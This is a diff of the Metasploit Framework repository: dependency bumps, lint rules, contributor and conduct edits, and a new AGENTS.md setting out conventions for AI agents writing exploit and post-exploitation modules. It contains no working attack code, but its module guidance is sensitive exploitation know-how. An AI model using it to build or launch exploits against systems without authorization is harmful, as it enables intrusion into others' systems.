# $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
# Write-Host $r
# $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
# Write-Host $r
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2025 Build (Windows)
+3
View File
@@ -102,3 +102,6 @@ rspec.failures
#Ignore any base disk store files
db/modules_metadata_base.pstore
# gradle build files
**/.gradle
+12
View File
@@ -0,0 +1,12 @@
---
inclusion: always
---
# Metasploit Framework — Kiro Steering
Follow the project's AI agent instructions and coding conventions defined in the repository root.
## References
- AI agent instructions: #[[file:AGENTS.md]]
- Contributing guide: #[[file:CONTRIBUTING.md]]
- RuboCop config: #[[file:.rubocop.yml]]
+20
View File
@@ -24,6 +24,9 @@ require:
- ./lib/rubocop/cop/lint/module_enforce_notes.rb
- ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
- ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
- ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb
- ./lib/rubocop/cop/lint/datastore_srvhost_usage.rb
- ./lib/rubocop/cop/lint/bare_check_code_in_non_exploit.rb
Layout/SpaceBeforeBrackets:
Enabled: true
@@ -676,3 +679,20 @@ Style/UnpackFirst:
Lint/DetectMetadataTrailingLeadingWhitespace:
Enabled: true
Lint/DetectOutdatedCmdExecApi:
Description: >-
Detects outdated usage of cmd_exec with separate arguments.
Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
Enabled: true
Lint/BareCheckCodeInNonExploit:
Description: >-
Use Exploit::CheckCode instead of bare CheckCode in non-exploit modules.
Bare CheckCode will raise a NameError at runtime in auxiliary, post, and evasion modules
because CheckCode is defined inside Msf::Exploit which is not in their ancestor chain.
Enabled: true
Include:
- 'modules/auxiliary/**/*'
- 'modules/post/**/*'
- 'modules/evasion/**/*'
+122
View File
@@ -0,0 +1,122 @@
# AI Agent Instructions for Metasploit Framework
## Project Overview
Metasploit Framework is an open-source penetration testing and exploitation framework written in Ruby. It provides infrastructure for developing, testing, and executing exploit code against remote targets.
## Project Structure
- `modules/` — Metasploit modules (exploits, auxiliary, post, payloads, encoders, evasion, nops)
- `lib/msf/` — Core framework library code
- `lib/rex/` — Rex (Ruby Exploitation) library
- `lib/metasploit/` — Metasploit namespace libraries
- `data/` — Data files used by modules (wordlists, templates, binaries)
- `spec/` — RSpec test suite
- `tools/` — Developer and operational tools
- `plugins/` — msfconsole plugins
- `scripts/` — Example automation scripts
## Coding Conventions
- Ruby (see `.ruby-version` for the current version). Minimum supported: 3.1+
- Follow the project's `.rubocop.yml` configuration — run `rubocop` on changed files before submitting
- Run `ruby tools/dev/msftidy.rb <module_file_path>` to catch common module issues
- Add `# frozen_string_literal: true` to new files (the RuboCop cop is disabled project-wide for legacy code, but new files should include it)
- No enforced line length limit, but keep code readable
- Use `%q{}` for long multi-line strings (curly braces preferred for module descriptions)
- Multiline block comments are acceptable for embedded code snippets/payloads
- Don't use `get_`/`set_` prefixes for accessor methods in new code
- Method parameter names must be at least 2 characters (exception for well-known crypto abbreviations)
### Module Development
- Prefer writing modules in Ruby. Go and Python modules are accepted, but their external runtimes don't support the full framework API (e.g. network pivoting). Ruby modules do not have this limitation
- Prefer using hash over an array for return values, and use kwargs for reusable APIs for future extensions
- Before writing a new module, check that there is not an existing module or open pull request that already covers the same functionality
- Each module should be in its own file under the appropriate `modules/` subdirectory. In some scenarios adding module actions or targets is preferred.
- Exploits require a `DisclosureDate` field
- Exploits, auxiliary, and post modules require `Notes` with `SideEffects`
- Use the module mixin APIs — don't reinvent the wheel
- Use `create_process(executable, args: [], time_out: 15, opts: {})` instead of the deprecated `cmd_exec` with separate arguments
- License new code with `MSF_LICENSE` (the project default, defined in `lib/msf/core/constants.rb`)
- When overriding `cleanup`, always call `super` to ensure the parent mixin chain cleans up connections and sessions properly
- When possible don't set a default payload (`DefaultOptions` with `'PAYLOAD'`) in modules — let the framework choose the most appropriate payload automatically
- New modules require an associated markdown file in the `documentation/modules` folder with the same structure, including steps to set up the vulnerable environment for testing
- Module descriptions or documentation should list the range of vulnerable versions and the fixed version of the affected software, when known
- `report_service` method called when a service can be reported
- `report_vuln` method called when a vuln can be reported
- When creating a fake account / username use FAKER not `rand_test_alphanumeric`
- Always use `res.get_json_document` to convert an HTTP response to a hash instead of calling `JSON.parse(res.body)`
- If there's only one `ACTION` in the exploit, it can likely be omitted.
- `Msf::Exploit::SQLi` should be used if it's exploiting an SQLi
- All `print_*` calls should start with a capital
- when opening a file, make sure the file exists first
- when checking for a string in a response - will it always be in english?
- Ensure hardcoded strings being regex'ed will be consistent across multiple versions
- Use the TEST-NET-1 range for example / non-routeable IP addresses in unit tests and spec files: `192.0.2.0`. Local/private IPs are fine in module documentation scenarios.
- Use fetch payload instead of command stagers when only options that request the stage are available (i.e. dont use a cmd stager and only allow curl/wget).
- Define bad characters instead of explicitly base-64 encoding payloads
- Use `ARCH_CMD` payloads instead of command stagers when only curl/wget and other download mechanisms would be available
- Dont check the number of sessions at the end of an exploit and report success based on that, not all payloads open sessions
- Dont submit any kind of opaque binary blob, everything must include source code and build instructions
- Dont print host information like `#{ip}:#{port}` because it doesnt handle IPv6 addresses, instead use `#{Rex::Socket.to_authority(ip, port)}`
- Implement a `check` method when possible to allow users to verify vulnerability before exploitation
### Check Methods
- `check` methods must only return `CheckCode` values (e.g. `CheckCode::Vulnerable`, `CheckCode::Safe`) — never raise exceptions or call `fail_with`
- When writing a `check` method, verify it does not produce false positives when run against unrelated software or services
- Prefer using `Rex::Version` for version checks
- Use `fail_with(Failure::UnexpectedReply, '...')` (and other `Failure::*` constants) to bail out of `exploit`/`run` methods — don't use `raise` or bare `return` for error conditions
- `get_version` methods should return a REX version
- `CheckCode::Vulnerable` is only used when the vulnerability has been exploited
- `CheckCode::Appears` is only used when the application's versions has been checked`
- Use specific regular expressions or `res.get_html_document` for version extraction with CSS selectors. Don't use a generic selectors like `href .*` dot star to grab the version, be more precise.
- Do catch exceptions that may be raised and ensure a valid Check Code is returned
- Do research and determine a minimum version where the application is vulnerable, mark prior versions as safe
- Check helper methods that are used by both `#check` and `#exploit` (or `#run`) and make sure there is no condition (exception, return, etc) where `#check` could return something else than CheckCode.
- Prefer `prepend Msf::Exploit::Remote::AutoCheck` over manually calling `check` inside `exploit` — this lets the framework handle check-before-exploit automatically
### Library Code
- When adding complex binary or protocol parsing (e.g. BinData, RASN1, Rex::Struct2), include a code comment linking to the specification or RFC that defines the format being implemented
- Write RSpec tests for any library changes
- Follow [Better Specs](http://www.betterspecs.org/) conventions
- Write YARD documentation for public methods
- Keep PRs focused — small fixes are easier to review
- Any new hash cracking implementations require adding a test hash to `tools/dev/hash_cracker_validator.rb` and ensuring that passes without error
### Testing
- Tests live in `spec/` mirroring the `lib/` structure
- Run tests with: `bundle exec rspec spec/path/to/spec.rb`
### Preferred Libraries
- Use the `RubySMB` library for SMB modules
- Use `Rex::Stopwatch.elapsed_time` to track elapsed time
- Use the `Rex::MIME::Message` class for MIME messages instead of hardcoding XML
- When creating random variable names prefer `Rex::RandomIdentifier::Generator` and specify the runtime language used. This avoids generating langauge keywords that would break the script.
## Common Patterns
- Register options with `register_options` and `register_advanced_options`
- Use `SCREAMING_SNAKE_CASE` option names and `CamelCase` advanced option names
- Use `datastore['OPTION_NAME']` to access module options
- Use `print_status`, `print_good`, `print_error`, `print_warning` for console output
- Use `vprint_*` variants for verbose-only output
- Use `send_request_cgi` for HTTP requests in modules
- Use `connect` / `disconnect` for TCP socket operations
## Before Submitting
- Ensure `rubocop` and `msftidy` pass on any changed files with no new offenses
- Ensure `ruby tools/dev/msftidy_docs.rb <documentation_file>` passes on any changed documentation markdown docs with no new offenses
## What NOT to Do
- Don't submit untested code — all code must be manually verified
- Don't include sensitive information (IPs, credentials, API keys, hashes of credentials) in code or docs
- Don't include more than one module per pull request
- Don't add new scripts to `scripts/` — use post modules instead
- Don't use `pack`/`unpack` with invalid directives (enforced by linter)
+1 -1
View File
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project maintainers at msfdev@metasploit.com. If
the incident involves a committer, you may report it directly to
caitlin_condon@rapid7.com or todb@metasploit.com.
smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.
All complaints will be reviewed and investigated and will result in a
response that is deemed necessary and appropriate to the circumstances.
+8 -6
View File
@@ -8,14 +8,14 @@ Before we get into the details of contributing code, you should know there are m
- You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow users with open issues](https://github.com/rapid7/metasploit-framework/issues). This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. For a detailed reference of our coding conventions, project structure, and preferred patterns, see [AGENTS.md](./AGENTS.md). Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
## Expedited Module Creation Process
We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR. A good-faith PR might not even work, but it will show that the author is working their way toward a solution. Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted. This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc. In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly. If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree. We sincerely hope that the original author will remain involved in this expedited module creation process. We would appreciate testing, critiquing, and any assistance that can be offered. If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible. In these cases of minor code changes, the authorship of the module will remain unchanged. We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.
### Code Contribution Do's & Don'ts:
## Vibecoding, AI, and LLM
My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does. Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review. We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did. While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.
### Code Contribution Do's & Don'ts:
Keeping the following in mind gives your contribution the best chance of landing!
#### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
* **Do** target your pull request to the **master branch**.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for effects that can be witnessed in the `msfconsole`.
* **Do** test your code.
* **Do** test your code and submit the test output in your PR with any sensitive information removed.
* **Do** list [verification steps] so committers can test your code.
* **Do** [reference associated issues] in your pull request description.
* **Don't** leave your pull request description blank.
@@ -85,7 +87,7 @@ When reporting Metasploit issues:
* **Don't** attempt to report issues on a closed PR.
If you need some more guidance, talk to the main body of open source contributors over on our
[Metasploit Slack] or [#metasploit on Freenode IRC].
[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
curve, so keep it up!
+1 -1
View File
@@ -1,4 +1,4 @@
Copyright (C) 2006-2025, Rapid7, Inc.
Copyright (C) 2006-2026, Rapid7, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
+2 -1
View File
@@ -53,5 +53,6 @@ group :test do
gem 'allure-rspec'
# Manipulate Time.now in specs
gem 'timecop'
# stub and set expectations on HTTP requests
gem 'webmock', '~> 3.18'
end
+142 -113
View File
@@ -1,12 +1,12 @@
PATH
remote: .
specs:
metasploit-framework (6.4.76)
metasploit-framework (6.4.133)
aarch64
abbrev
actionpack (~> 7.1.0)
activerecord (~> 7.1.0)
activesupport (~> 7.1.0)
actionpack (~> 7.2.0)
activerecord (~> 7.2.0)
activesupport (~> 7.2.0)
aws-sdk-ec2
aws-sdk-ec2instanceconnect
aws-sdk-iam
@@ -20,8 +20,8 @@ PATH
bootsnap
bson
chunky_png
concurrent-ruby (= 1.3.4)
csv
date (= 3.4.1)
dnsruby
drb
ed25519
@@ -29,7 +29,7 @@ PATH
em-http-request
eventmachine
faker
faraday (= 2.7.11)
faraday
faraday-retry
faye-websocket
ffi (< 1.17.0)
@@ -42,13 +42,14 @@ PATH
jsobfu
json
lru_redux
mcp (= 0.13.0)
metasm
metasploit-concern
metasploit-credential
metasploit-credential (>= 6.0.21)
metasploit-model
metasploit-payloads (= 2.0.221)
metasploit_data_models (>= 6.0.7)
metasploit_payloads-mettle (= 1.0.42)
metasploit-payloads (= 2.0.245)
metasploit_data_models (>= 6.0.15)
metasploit_payloads-mettle (= 1.0.46)
mqtt
msgpack (~> 1.6.0)
mutex_m
@@ -61,11 +62,12 @@ PATH
network_interface
nexpose
nokogiri
octokit (~> 4.0)
octokit
openssl-ccm
openvas-omp
ostruct
packetfu
parallel
patch_finder
pcaprub
pdf-reader
@@ -78,6 +80,7 @@ PATH
recog
redcarpet
reline
rest-client
rex-arch
rex-bin_tools
rex-core
@@ -96,10 +99,11 @@ PATH
rex-struct2
rex-text
rex-zip
rexml (= 3.4.1)
rinda
ruby-macho
ruby-mysql
ruby_smb (~> 3.3.15)
ruby_smb (~> 3.3.17)
rubyntlm
rubyzip
sinatra (~> 3.2)
@@ -108,7 +112,7 @@ PATH
stringio (= 3.1.1)
swagger-blocks
syslog
thin (~> 1.8)
thin (~> 1.x)
tzinfo
tzinfo-data
unix-crypt
@@ -127,41 +131,41 @@ GEM
aarch64 (2.1.0)
racc (~> 1.6)
abbrev (0.1.2)
actionpack (7.1.5.1)
actionview (= 7.1.5.1)
activesupport (= 7.1.5.1)
actionpack (7.2.2.2)
actionview (= 7.2.2.2)
activesupport (= 7.2.2.2)
nokogiri (>= 1.8.5)
racc
rack (>= 2.2.4)
rack (>= 2.2.4, < 3.2)
rack-session (>= 1.0.1)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.2)
rails-html-sanitizer (~> 1.6)
actionview (7.1.5.1)
activesupport (= 7.1.5.1)
useragent (~> 0.16)
actionview (7.2.2.2)
activesupport (= 7.2.2.2)
builder (~> 3.1)
erubi (~> 1.11)
rails-dom-testing (~> 2.2)
rails-html-sanitizer (~> 1.6)
activemodel (7.1.5.1)
activesupport (= 7.1.5.1)
activerecord (7.1.5.1)
activemodel (= 7.1.5.1)
activesupport (= 7.1.5.1)
activemodel (7.2.2.2)
activesupport (= 7.2.2.2)
activerecord (7.2.2.2)
activemodel (= 7.2.2.2)
activesupport (= 7.2.2.2)
timeout (>= 0.4.0)
activesupport (7.1.5.1)
activesupport (7.2.2.2)
base64
benchmark (>= 0.3)
bigdecimal
concurrent-ruby (~> 1.0, >= 1.0.2)
concurrent-ruby (~> 1.0, >= 1.3.1)
connection_pool (>= 2.2.5)
drb
i18n (>= 1.6, < 2)
logger (>= 1.4.2)
minitest (>= 5.1)
mutex_m
securerandom (>= 0.3)
tzinfo (~> 2.0)
tzinfo (~> 2.0, >= 2.0.5)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
afm (0.2.2)
@@ -175,61 +179,65 @@ GEM
arel-helpers (2.16.0)
activerecord (>= 3.1.0, < 8.1)
ast (2.4.3)
aws-eventstream (1.4.0)
aws-partitions (1.1134.0)
aws-sdk-core (3.227.0)
aws-eventstream (1.3.2)
aws-partitions (1.1065.0)
aws-sdk-core (3.220.1)
aws-eventstream (~> 1, >= 1.3.0)
aws-partitions (~> 1, >= 1.992.0)
aws-sigv4 (~> 1.9)
base64
jmespath (~> 1, >= 1.6.1)
logger
aws-sdk-ec2 (1.541.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-ec2 (1.511.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
aws-sdk-ec2instanceconnect (1.59.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-ec2instanceconnect (1.55.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
aws-sdk-iam (1.125.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-iam (1.119.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
aws-sdk-kms (1.107.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-kms (1.99.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
aws-sdk-s3 (1.194.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-s3 (1.182.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.5)
aws-sdk-ssm (1.199.0)
aws-sdk-core (~> 3, >= 3.227.0)
aws-sdk-ssm (1.191.0)
aws-sdk-core (~> 3, >= 3.216.0)
aws-sigv4 (~> 1.5)
aws-sigv4 (1.12.1)
aws-sigv4 (1.11.0)
aws-eventstream (~> 1, >= 1.0.2)
base64 (0.2.0)
base64 (0.3.0)
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
benchmark (0.4.1)
bigdecimal (3.2.2)
bigdecimal (3.3.1)
bindata (2.4.15)
bootsnap (1.18.6)
bootsnap (1.18.4)
msgpack (~> 1.2)
bson (5.1.1)
builder (3.3.0)
byebug (12.0.0)
chunky_png (1.4.0)
coderay (1.1.3)
concurrent-ruby (1.3.4)
connection_pool (2.5.3)
concurrent-ruby (1.3.5)
connection_pool (2.5.4)
cookiejar (0.3.4)
crack (1.0.1)
bigdecimal
rexml
crass (1.0.6)
csv (3.3.5)
csv (3.3.2)
daemons (1.4.1)
date (3.4.1)
debug (1.11.0)
irb (~> 1.10)
reline (>= 0.3.8)
diff-lcs (1.6.2)
dnsruby (1.72.2)
dnsruby (1.73.1)
base64 (>= 0.2)
logger (~> 1.6)
simpleidn (~> 0.2.1)
docile (1.4.1)
domain_name (0.6.20240107)
@@ -246,28 +254,28 @@ GEM
em-socksify (0.3.3)
base64
eventmachine (>= 1.0.0.beta.4)
erb (5.0.2)
erb (5.0.3)
erubi (1.13.1)
eventmachine (1.2.7)
factory_bot (6.5.4)
factory_bot (6.5.5)
activesupport (>= 6.1.0)
factory_bot_rails (6.5.0)
factory_bot_rails (6.5.1)
factory_bot (~> 6.5)
railties (>= 6.1.0)
faker (3.5.2)
faker (3.5.1)
i18n (>= 1.8.11, < 2)
faraday (2.7.11)
base64
faraday-net_http (>= 2.0, < 3.1)
ruby2_keywords (>= 0.0.4)
faraday-net_http (3.0.2)
faraday-retry (2.3.2)
faraday-retry (2.2.1)
faraday (~> 2.0)
faye-websocket (0.12.0)
faye-websocket (0.11.3)
eventmachine (>= 0.12.0)
websocket-driver (>= 0.8.0)
websocket-driver (>= 0.5.1)
ffi (1.16.3)
fiddle (1.1.8)
fiddle (1.1.6)
filesize (0.2.0)
fivemat (1.3.7)
forwardable (1.3.3)
@@ -277,11 +285,13 @@ GEM
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashdiff (1.2.1)
hashery (2.1.2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
ed25519 (~> 1.2)
hrr_rb_ssh (>= 0.4)
http-accept (1.7.0)
http-cookie (1.0.8)
domain_name (~> 0.5)
http_parser.rb (0.8.0)
@@ -298,7 +308,10 @@ GEM
jmespath (1.6.2)
jsobfu (0.4.2)
rkelly-remix
json (2.13.1)
json (2.15.1)
json-schema (6.2.0)
addressable (~> 2.8)
bigdecimal (>= 3.1, < 5)
language_server-protocol (3.17.0.5)
license_finder (5.11.1)
bundler
@@ -317,6 +330,8 @@ GEM
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
lru_redux (1.1.0)
mcp (0.13.0)
json-schema (>= 4.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.5)
@@ -326,7 +341,7 @@ GEM
mutex_m
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.16)
metasploit-credential (6.0.23)
bigdecimal
csv
drb
@@ -339,7 +354,7 @@ GEM
railties
rex-socket
rubyntlm
rubyzip
rubyzip (< 3.0.0)
metasploit-model (5.0.4)
activemodel (~> 7.0)
activesupport (~> 7.0)
@@ -347,36 +362,37 @@ GEM
drb
mutex_m
railties (~> 7.0)
metasploit-payloads (2.0.221)
metasploit_data_models (6.0.10)
activerecord (~> 7.0)
activesupport (~> 7.0)
metasploit-payloads (2.0.245)
metasploit_data_models (6.0.18)
activerecord (>= 7.0, < 8.1)
activesupport (>= 7.0, < 8.1)
arel-helpers
bigdecimal
drb
metasploit-concern
metasploit-model (>= 3.1)
metasploit-model (>= 5.0.4)
mutex_m
pg
railties (~> 7.0)
railties (>= 7.0, < 8.1)
recog
webrick
metasploit_payloads-mettle (1.0.42)
metasploit_payloads-mettle (1.0.46)
method_source (1.1.0)
mime-types (3.7.0)
logger
mime-types-data (~> 3.2025, >= 3.2025.0507)
mime-types-data (3.2025.0722)
mime-types-data (3.2025.0924)
mini_portile2 (2.8.9)
minitest (5.25.5)
mqtt (0.6.0)
mqtt (0.7.0)
logger
msgpack (1.6.1)
multi_json (1.17.0)
multi_json (1.15.0)
mustermann (3.0.3)
ruby2_keywords (~> 0.0.1)
mutex_m (0.3.0)
nessus_rest (0.1.6)
net-imap (0.5.9)
net-imap (0.5.6)
date
net-protocol
net-ldap (0.19.0)
@@ -387,25 +403,26 @@ GEM
net-smtp (0.5.1)
net-protocol
net-ssh (7.3.0)
netrc (0.11.0)
network_interface (0.0.4)
nexpose (7.3.0)
nio4r (2.7.4)
nokogiri (1.18.9)
nokogiri (1.18.10)
mini_portile2 (~> 2.8.2)
racc (~> 1.4)
nori (2.7.1)
bigdecimal
octokit (4.25.1)
octokit (10.0.0)
faraday (>= 1, < 3)
sawyer (~> 0.9)
openssl-ccm (1.2.3)
openssl-cmac (2.0.2)
openvas-omp (0.0.4)
ostruct (0.6.3)
ostruct (0.6.1)
packetfu (2.0.0)
pcaprub (~> 0.13.1)
parallel (1.27.0)
parser (3.3.8.0)
parser (3.3.9.0)
ast (~> 2.4.1)
racc
parslet (1.8.2)
@@ -418,10 +435,10 @@ GEM
ruby-rc4
ttfunk
pg (1.5.9)
pp (0.6.2)
pp (0.6.3)
prettyprint
prettyprint (0.2.0)
prism (1.4.0)
prism (1.5.1)
pry (0.15.2)
coderay (~> 1.1)
method_source (~> 1.0)
@@ -435,7 +452,7 @@ GEM
puma (6.6.0)
nio4r (~> 2.0)
racc (1.8.1)
rack (2.2.17)
rack (2.2.19)
rack-protection (3.2.0)
base64 (>= 0.1.0)
rack (~> 2.2, >= 2.2.4)
@@ -453,10 +470,10 @@ GEM
rails-html-sanitizer (1.6.2)
loofah (~> 2.21)
nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
railties (7.1.5.1)
actionpack (= 7.1.5.1)
activesupport (= 7.1.5.1)
irb
railties (7.2.2.2)
actionpack (= 7.2.2.2)
activesupport (= 7.2.2.2)
irb (~> 1.13)
rackup (>= 1.0.0)
rake (>= 12.2)
thor (~> 1.0, >= 1.2.2)
@@ -466,30 +483,36 @@ GEM
rasn1 (0.14.0)
strptime (~> 0.2.5)
rb-readline (0.5.5)
rdoc (6.14.2)
rdoc (6.15.0)
erb
psych (>= 4.0.0)
recog (3.1.18)
tsort
recog (3.1.14)
nokogiri
redcarpet (3.6.1)
regexp_parser (2.10.0)
regexp_parser (2.11.3)
reline (0.6.2)
io-console (~> 0.5)
require_all (3.0.0)
rex-arch (0.1.18)
rest-client (2.1.0)
http-accept (>= 1.7.0, < 2.0)
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 4.0)
netrc (~> 0.8)
rex-arch (0.1.20)
rex-text
rex-bin_tools (0.1.12)
rex-bin_tools (0.1.16)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.34)
rex-encoder (0.1.8)
rex-core (0.1.36)
rex-encoder (0.1.10)
metasm
rex-arch
rex-text
rex-exploitation (0.1.42)
rex-exploitation (0.1.44)
bigdecimal
jsobfu
metasm
@@ -499,19 +522,18 @@ GEM
rex-text
rexml
rex-java (0.1.8)
rex-mime (0.1.12)
bigdecimal
rex-mime (0.1.11)
rex-text
rex-nop (0.1.4)
rex-arch
rex-ole (0.1.9)
rex-text
rex-powershell (0.1.102)
rex-powershell (0.1.103)
bigdecimal
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.16)
rex-random_identifier (0.1.21)
bigdecimal
rex-text
rex-registry (0.1.6)
@@ -519,7 +541,7 @@ GEM
metasm
rex-core
rex-text
rex-socket (0.1.63)
rex-socket (0.1.65)
dnsruby
rex-core
rex-sslscan (0.1.13)
@@ -527,7 +549,7 @@ GEM
rex-socket
rex-text
rex-struct2 (0.1.5)
rex-text (0.2.61)
rex-text (0.2.63)
bigdecimal
rex-zip (0.1.6)
rex-text
@@ -549,17 +571,17 @@ GEM
rspec-mocks (3.13.5)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-rails (7.1.1)
actionpack (>= 7.0)
activesupport (>= 7.0)
railties (>= 7.0)
rspec-rails (8.0.2)
actionpack (>= 7.2)
activesupport (>= 7.2)
railties (>= 7.2)
rspec-core (~> 3.13)
rspec-expectations (~> 3.13)
rspec-mocks (~> 3.13)
rspec-support (~> 3.13)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.13.4)
rspec-support (3.13.6)
rubocop (1.75.7)
json (~> 2.3)
language_server-protocol (~> 3.17.0.2)
@@ -571,7 +593,7 @@ GEM
rubocop-ast (>= 1.44.0, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 4.0)
rubocop-ast (1.46.0)
rubocop-ast (1.47.1)
parser (>= 3.3.7.2)
prism (~> 1.4)
ruby-macho (4.1.0)
@@ -581,7 +603,7 @@ GEM
ruby-progressbar (1.13.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
ruby_smb (3.3.16)
ruby_smb (3.3.17)
bindata (= 2.4.15)
openssl-ccm
openssl-cmac
@@ -597,7 +619,7 @@ GEM
simplecov (0.18.2)
docile (~> 1.1)
simplecov-html (~> 0.11)
simplecov-html (0.13.2)
simplecov-html (0.13.1)
simpleidn (0.2.3)
sinatra (3.2.0)
mustermann (~> 3.0)
@@ -618,25 +640,31 @@ GEM
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.4.0)
tilt (2.6.1)
tilt (2.6.0)
timecop (0.9.10)
timeout (0.4.3)
toml (0.2.0)
parslet (~> 1.8.0)
